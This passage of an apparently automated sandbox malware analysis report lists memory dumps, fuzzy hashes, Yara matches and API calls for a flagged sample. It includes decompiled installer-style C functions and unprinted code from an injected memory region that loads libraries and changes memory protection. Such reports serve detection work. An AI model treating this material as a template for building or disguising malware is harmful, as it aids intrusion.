Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C

Uniqueness

Uniqueness Score: -1.00%

Function 033B9040 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 033B9044

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: ec7adb53138cdd91d6dda6ba0c14b150d3ea5e0c25c9b84e4121f1b65caabd4e
Instruction ID: 65f77ec968273599a6c4906cced0baa631005829078c2bec9fd90f6adba717b1
Opcode Fuzzy Hash: ec7adb53138cdd91d6dda6ba0c14b150d3ea5e0c25c9b84e4121f1b65caabd4e
Instruction Fuzzy Hash: 95A0022015254A87DE609F78A44B6C937A09B5654DF4894509C9E98652C960A14B4752

Uniqueness

Uniqueness Score: -1.00%

Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404498(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a228, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004044a6
0x004044ac

APIs

SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004034AF Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034AF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034bd
0x004034c3

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404485 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404485(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x423704, _a4); // executed
				return _t2;
			}

0x0040448f
0x00404495

APIs

KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D

Uniqueness

Uniqueness Score: -1.00%

Function 033B855D Relevance: 1.4, APIs: 1, Instructions: 198sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?), ref: 033B8612

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 60edb60a7392d4d7de43c7a76bc20b24c57e148b3366bbe77fc9b898747e78db
Instruction ID: 0f3724b108e6da80a4fac0ac6cdd672b3685764e5b1439e36a90aab8366ee463
Opcode Fuzzy Hash: 60edb60a7392d4d7de43c7a76bc20b24c57e148b3366bbe77fc9b898747e78db
Instruction Fuzzy Hash: 655196E2C2C2EA5AC7239AF8B46D2DDBF745F13234F08998DE5886F197F6D145028742

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404954 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404954(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x4226e0; // 0x5bc3cc
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B4B(0x3fb, _t146);
					E0040678E(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B4B(0x3fb, _t146);
							if(E00405EDE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406507(0x4216d8, _t146);
							_t87 = E004068D4(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406507(0x4216d8, _t146);
								_t89 = E00405E81(0x4216d8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216d8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216d8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216d8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E22(0x4216d8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216d8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404DF1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x4291fc + 0x10)) != _t158) {
									E00404DD9(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216c8);
									} else {
										E00404D10(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404485(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x4236f8 == _t158) {
									E004048AD();
								}
								 *0x4236f8 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423708;
							_v60 = E00404CAA;
							_v56 = _t146;
							_v68 = E00406544(_t146, 0x423708, _t167, 0x421ee0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405DD6(_t146);
								_t125 =  *((intOrPtr*)( *0x42a230 + 0x11c));
								if( *((intOrPtr*)( *0x42a230 + 0x11c)) != 0 && _t146 == 0x435800) {
									E00406544(_t146, 0x423708, _t167, 0, _t125);
									if(lstrcmpiW(0x4281c0, 0x423708) != 0) {
										lstrcatW(_t146, 0x4281c0);
									}
								}
								 *0x4236f8 =  *0x4236f8 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E4D(_t146) != 0 && E00405E81(_t146) == 0) {
						E00405DD6(_t146);
					}
					 *0x4291f8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404463(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404463(_t167);
					E00404498(_t166);
					_t138 = E004068D4(8);
					if(_t138 == 0) {
						L53:
						return E004044CA(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404954
0x0040495a
0x00404960
0x0040496d
0x0040497b
0x0040497e
0x00404986
0x0040498c
0x0040498c
0x00404998
0x0040499b
0x00404a09
0x00404a10
0x00404ae7
0x00404aee
0x00404afd
0x00404afd
0x00404b01
0x00404b0b
0x00404b18
0x00404b1a
0x00404b1a
0x00404b28
0x00404b2f
0x00404b36
0x00404b39
0x00404b75
0x00404b77
0x00404b7d
0x00404b82
0x00404b86
0x00404b88
0x00404b88
0x00404ba4
0x00000000
0x00404ba6
0x00404ba9
0x00404bb7
0x00404bbd
0x00404bbe
0x00404bc1
0x00404bc4
0x00000000
0x00404bc4
0x00404b3b
0x00404b3d
0x00404b41
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b43
0x00404b43
0x00404b50
0x00404b55
0x00000000
0x00000000
0x00404b59
0x00404b5b
0x00404b5b
0x00404b64
0x00404b66
0x00404b6b
0x00404b6e
0x00404b73
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b73
0x00404bd0
0x00404bda
0x00404bdd
0x00404be0
0x00404be7
0x00404be7
0x00404be9
0x00404be9
0x00404bee
0x00404bf0
0x00404bf8
0x00404bff
0x00404c01
0x00404c0c
0x00404c0c
0x00404c01
0x00404c1c
0x00404c26
0x00404c2e
0x00404c49
0x00404c30
0x00404c39
0x00404c39
0x00404c2e
0x00404c4e
0x00404c53
0x00404c58
0x00404c61
0x00404c61
0x00404c6a
0x00404c6c
0x00404c6c
0x00404c78
0x00404c80
0x00404c8a
0x00404c8a
0x00404c8f
0x00000000
0x00404c8f
0x00404b39
0x00404af0
0x00404af7
0x00000000
0x00000000
0x00000000
0x00404af7
0x00404a16
0x00404a1f
0x00404a39
0x00404a3e
0x00404a48
0x00404a4f
0x00404a5b
0x00404a5e
0x00404a61
0x00404a68
0x00404a70
0x00404a73
0x00404a77
0x00404a7e
0x00404a86
0x00404ae0
0x00404a88
0x00404a89
0x00404a90
0x00404a9a
0x00404aa2
0x00404aaf
0x00404ac3
0x00404ac7
0x00404ac7
0x00404ac3
0x00404acc
0x00404ad9
0x00404ad9
0x00404a86
0x00000000
0x00404a3e
0x00404a2c
0x00000000
0x00000000
0x00404a32
0x00000000
0x0040499d
0x004049aa
0x004049b3
0x004049c0
0x004049c0
0x004049c7
0x004049cd
0x004049d6
0x004049d9
0x004049dc
0x004049e4
0x004049e7
0x004049ea
0x004049f0
0x004049f7
0x004049fe
0x00404c95
0x00404ca7
0x00404a04
0x00404a07
0x00000000
0x00404a07
0x004049fe

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049A3
SetWindowTextW.USER32(00000000,?), ref: 004049CD
SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
CoTaskMemFree.OLE32(00000000), ref: 00404A89
lstrcmpiW.KERNEL32(Call,00423708,00000000,?,?), ref: 00404ABB
lstrcatW.KERNEL32(?,Call), ref: 00404AC7
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9

Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E

Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76D23420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
Part of subcall function 0040678E: CharNextW.USER32(?,00000000,76D23420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
Part of subcall function 0040678E: CharPrevW.USER32(?,?,76D23420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7

Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD

Strings

Call, xrefs: 00404AB5, 00404ABA, 00404AC5
A, xrefs: 00404A77

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$Call
API String ID: 2624150263-209694386
Opcode ID: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
Opcode Fuzzy Hash: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 033BD0E8 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

q<YP, xrefs: 033BD5CC
D(', xrefs: 033BD3CB

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: q<YP$D('
API String ID: 1029625771-2207832325
Opcode ID: 949a94d86def6c4436f8742a2587aafe9f63030f034360d456ac3cc533acdf68
Instruction ID: f70ef1cad8582670844d0834f773c039c5ec6b575c03f09c822a6e0195c6b8c9
Opcode Fuzzy Hash: 949a94d86def6c4436f8742a2587aafe9f63030f034360d456ac3cc533acdf68
Instruction Fuzzy Hash: 19C15531A0474ADFCB34DE288DD43EA77B6EF55390F58012ECD8A9BA41D3344A82CB52

Uniqueness

Uniqueness Score: -1.00%

Function 033B5BFF Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

5E, xrefs: 033B5D8C
5E, xrefs: 033B5D87

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 5E$5E
API String ID: 0-1230910448
Opcode ID: 374881d3bd0cfe0d861e42963f6bfd0ee5b80df455973a56513669a7f30613c6
Instruction ID: 34e01da8d88b3c349a085a9c131655f3bcd1cc8ee926bc8d55258055249ff5d4
Opcode Fuzzy Hash: 374881d3bd0cfe0d861e42963f6bfd0ee5b80df455973a56513669a7f30613c6
Instruction Fuzzy Hash: C8716731A017098FDB34CE6DCDD57EA33BAEF46760F558169DD8ACBA52D33488818B40

Uniqueness

Uniqueness Score: -1.00%

Function 033B61CF Relevance: 2.7, Strings: 2, Instructions: 167libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Strings

pB^, xrefs: 033B624D
}4C, xrefs: 033B621C

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: pB^$}4C
API String ID: 1029625771-2927481708
Opcode ID: a639492d8e4bc94f4a284e0dd86c80fb489c99a7fc49daf832033d858c38354e
Instruction ID: 280aa109816af5a6ca4a24ac42344aa24bc24d7fbbbee5154b7f18f4060cd7c8
Opcode Fuzzy Hash: a639492d8e4bc94f4a284e0dd86c80fb489c99a7fc49daf832033d858c38354e
Instruction Fuzzy Hash: 80511771A043CA9BCB31CEE9D9D63EABBF25F06320F08451ED9895B687D6B09441CB05

Uniqueness

Uniqueness Score: -1.00%

Function 033B5C4E Relevance: 2.7, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

5E, xrefs: 033B5D8C
5E, xrefs: 033B5D87

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 5E$5E
API String ID: 0-1230910448
Opcode ID: c9ebc2a04f41e933bd472d0053a635a2c2b53cbe7ec7187d1306a17ad2925460
Instruction ID: 1638102389a63350091c0cbf27bdec9c05a8164ad78252b1f984d7cdc9b50d87
Opcode Fuzzy Hash: c9ebc2a04f41e933bd472d0053a635a2c2b53cbe7ec7187d1306a17ad2925460
Instruction Fuzzy Hash: 71514B7291539A9BCF32CFE8D8593DD3BB59F06330F15816DDC89AB586E3B448418B41

Uniqueness

Uniqueness Score: -1.00%

Function 033B5D06 Relevance: 2.6, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

5E, xrefs: 033B5D8C
5E, xrefs: 033B5D87

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 5E$5E
API String ID: 0-1230910448
Opcode ID: c5a789000396e250c21d0f7364af0c1438d3d3d8cc04a0910487356135964ee5
Instruction ID: 5c883833525f6dcbc7cd58faec327cd050479a3f9dede21c0d64395369ebe490
Opcode Fuzzy Hash: c5a789000396e250c21d0f7364af0c1438d3d3d8cc04a0910487356135964ee5
Instruction Fuzzy Hash: 9A4117729183969BCB328FE8D8597DD7FB59F06330F05C1ADD889AB687E3B448418741

Uniqueness

Uniqueness Score: -1.00%

Function 033AEE3E Relevance: 1.9, Strings: 1, Instructions: 611COMMON

Download Yara Rule

Strings

@, xrefs: 033AEFBD

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d4e63937f32bccb36d2553b4c20807a9254f460a8b7b0ba07a952f5e2e346343
Instruction ID: 0b321330aa4ad2d000b958d0d3a789593b370dc1d1971ab24b024613babca706
Opcode Fuzzy Hash: d4e63937f32bccb36d2553b4c20807a9254f460a8b7b0ba07a952f5e2e346343
Instruction Fuzzy Hash: C512296241C6EA5BCB27CBFCAC992DCBF65DF43230F1C9A9DD4846F587E2A044428741

Uniqueness

Uniqueness Score: -1.00%

Function 033BDB04 Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

~j, xrefs: 033BDC3B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: ~j
API String ID: 3389902171-175315596
Opcode ID: 717c5109a16825ffaffa4d596e7bed7a67ea3d754ce4983b1f0614f8001fa267
Instruction ID: e3b96985f8bb787d6815706714f352f87cc45a834167c1e289b32b609cd26de3
Opcode Fuzzy Hash: 717c5109a16825ffaffa4d596e7bed7a67ea3d754ce4983b1f0614f8001fa267
Instruction Fuzzy Hash: B7F1D7716083858FDB31DF38C8D47DA7BA2AF12360F59829ACC998F6A6D3348545C712

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
